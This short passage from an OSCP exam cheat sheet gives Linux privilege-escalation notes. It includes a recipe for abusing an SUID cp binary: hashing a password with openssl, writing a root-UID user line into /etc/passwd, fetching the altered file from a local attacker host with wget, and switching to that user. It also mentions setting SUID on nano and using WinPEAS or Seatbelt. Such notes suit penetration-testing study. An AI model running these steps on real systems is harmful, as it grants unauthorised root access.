redcountryroad/OSCP-shortsheet/README.md

 - to run binary program, can specify '/home' instead of current directory '.'
 - [if SUID bit set for cp, we can add a new user with root privileges to /etc/passwd file] to create new user(name: ignite) at end of /etc/passwd, first generate the $hash value first using 'openssl passwd -1 -salt ignite pass123'.
 Then insert $hash into 'ignite:$hash:0:0:root:/root:/bin/bash'.
 Then copy the passwd file back to victim machine (/etc) using 'wget -O passwd http://192.168.1.108:8000/passwd'.
 Then 'su ignite' password: 'pass123', 'whoami'.
 - admin to give SUID permission to nano: 'chmod u+s /bin/nano'
+- if WinPEAS failed i.e. Error, try using Seatbelt

 ## MSFVenom